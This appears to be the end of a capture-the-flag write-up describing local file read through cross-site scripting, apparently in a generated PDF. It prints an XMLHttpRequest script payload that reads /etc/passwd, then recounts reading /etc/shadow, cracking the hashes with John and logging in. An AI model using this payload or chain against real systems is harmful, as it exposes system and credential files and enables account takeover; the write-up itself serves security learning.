Payload Used:-

```html
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>

```

This render the /etc/passwd file.

Then I tried to open shadow file where all the password are stored in linux.


Fortunately, the /etc/shadow file rendered.


cracked the hash with john

then logged in with the username and password I got from john and got the flag


References:-
--> https://blog.noob.ninja/local-file-read-via-xss-in-dynamically-generated-pdf/